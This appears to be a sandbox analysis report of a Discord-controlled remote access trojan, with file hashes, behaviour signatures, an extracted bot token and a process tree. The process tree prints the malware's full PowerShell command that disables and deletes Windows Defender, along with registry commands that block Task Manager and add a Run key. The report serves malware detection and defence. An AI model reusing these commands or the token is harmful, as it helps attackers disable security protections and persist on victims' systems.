Overview

overview

10

Static

static

3

2c995d090b...47.exe

windows7-x64

10

2c995d090b...47.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2024, 22:08 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe

  • Size

    663KB

  • MD5

    043e699dbf3d88b6cca5fbe64229ba27

  • SHA1

    50661d32315985eab2a70f1d1f6435b9563ca237

  • SHA256

    2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747

  • SHA512

    04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2

  • SSDEEP

    6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos

Score
10/10
discordratdefense_evasiondiscoveryevasionpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIwNzY2MzY3MDU0MTE2MDUwOQ.Gd6pNB.ScrscETWuXpifr43j4YDLQN_-m1c2UlONmnRmo

  • server_id

    1097447165732868126

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 14 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
    "C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat" "
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
        bang_executor.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2616 -s 596
          4⤵
          • Loads dropped DLL
          PID:2808
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
        executer.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
          4⤵
            PID:2564
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ep bypass .\test.ps1;
              5⤵
              • Modifies security service
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K instaling.bat
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2536
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K mgr.bat
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2872
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K microsoft.bat
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:2780
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2992 -s 600
              5⤵
              • Loads dropped DLL
              PID:2588

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat
      Filesize

      121B

      MD5

      140d432dacc3a675f31bfc80171fc928

      SHA1

      6b886ca57fc64d079f943fae06210d41341b33b2

      SHA256

      dcb23167ac8eccdb760afc56b99ef4019cbcf9dbcdf1174f2040b361f3b4f534

      SHA512

      b925bec48d68ec12e6829e07c6d45b313505164d60444dd556f3f6e1739bdb4192e1c2a7d1f14f53c8c77086e49ab9f419df11e9b6c054906d05d5c38ba4cf6a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
      Filesize

      343KB

      MD5

      e1ead094e52097b884389a8064b15e2b

      SHA1

      894f8db63a8f41f913a5f5c69d1199ec8ae3f213

      SHA256

      82c67ed82a7a319c0ae30f92c187ea0150ac6ba6ef63d2d3b4fc999bb01d064f

      SHA512

      96bf368c771bbc9db1a23b8e57906530936372aa15c963ef370ef47a13328fc67201d4d184911679536ce952869a4bc2abdc42403e1978028c57c27b154ecea6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
      Filesize

      274KB

      MD5

      88e22186f196cc0e1e2d500eeac57337

      SHA1

      e5e0bd98f08de159880b58e918959c358efca6b1

      SHA256

      5dca36ce98da2185693a87305811cf7aeee7b3279298345e4d1f4d37efe0250b

      SHA512

      462fe680ba12da5fedec11d88ea17f9f65b80ee916f665d6208d9dcf3d3494c805d11aaf899914f621835b0a61d014000243fe01b2e00ca34681afc415a33ee6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\instaling.bat
      Filesize

      269B

      MD5

      7e86beb4c1ebeb8ab77f1d68f14fec37

      SHA1

      c9a40241b2407d9492c41bcd70686d6fd829f3bc

      SHA256

      5a60b3cc91782e0a7c8cd52701e603299b62c87c0b593d5ac85ebce74321f2f3

      SHA512

      653ce9cbcf427be11042340859f61cfa30105332acad13b94e2d509960ba04d67610276b6a7128d56aa139098b0c1c8d67973fff7a97976acfb33d474073d849

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\mgr.bat
      Filesize

      111B

      MD5

      9a4a032d9a604c9b7c1e843c6455140e

      SHA1

      dbe7a610e1697e62722efb59ad3bc03afcfd900f

      SHA256

      dc0890d3d4a7370ece704eb075c05418795c47332dffcc277896e806c38c3db0

      SHA512

      ca045ec576eb55c442959c2709148392fe53f1613b6c5dc9cb5b43592d77563479233c7dee6e0832e5a95528e1653ba6b73c73a3dc4ed841a7529e6344eccb3c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat
      Filesize

      288B

      MD5

      77c6969c2641f3c5d6ed44a4feb48f25

      SHA1

      9ff375b96cd38ca40a9694698e9aa3be1fc1d52e

      SHA256

      33dbedbe9fb27de7c1f75d742e3992675c4d683073538b02a8d69922f366cd6a

      SHA512

      530f05816854791916b3409161a1e488d661e02340c4ae7b442ede31f7b21f70a6b5cfd5d1b330ddd202e104b5f4219253c537d32770e0fddf0640d178eefa68

      Download Submit

    • C:\test.ps1
      Filesize

      3KB

      MD5

      3499745c76f31429c42a3b34d8cc0af6

      SHA1

      f9125070406cc2a2a6cf092f3ed3d36751107224

      SHA256

      3c2eb503e7d32f48b06199e6c1c350e559c316fd9f6f17f040e41079f44fb6e3

      SHA512

      1757ee5f42a8681e84ce3070d7ee164107ebc284bc0eb5424a4e71fe71e122eeadb28d63535d88557c0c49c687ce4514e8d387781ec7c68e1171994183dde1fb

      Download Submit

    • memory/2324-46-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2324-47-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2616-39-0x000000013FD20000-0x000000013FD7A000-memory.dmp

      Filesize

      360KB

      Download

    • memory/2704-40-0x00000000002E0000-0x000000000032A000-memory.dmp

      Filesize

      296KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.